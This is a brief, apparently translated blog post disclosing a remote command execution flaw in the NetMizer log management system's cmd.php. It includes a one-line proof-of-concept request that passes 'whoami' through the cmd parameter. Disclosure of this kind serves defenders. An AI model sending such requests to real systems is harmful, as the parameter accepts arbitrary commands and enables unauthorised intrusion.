Post

Netmizer Log Management System Cmd Php Remote Command Execution Vulnerability

Netmizer Log Management System Cmd Php Remote Command Execution Vulnerability

NetMizer log management system cmd.php remote command execution vulnerability

Vulnerability Description

There is a remote command execution vulnerability in the NetMizer log management system cmd.php. The attacker can execute the command by passing in cmd parameters.

Vulnerability Impact

NetMizer log management system

Network surveying and mapping

Vulnerability reappears

Login page

img

Verify POC

1
/data/manage/cmd.php?cmd=whoami

img

If you gain something, just like it

This post is licensed under CC BY 4.0 by the author.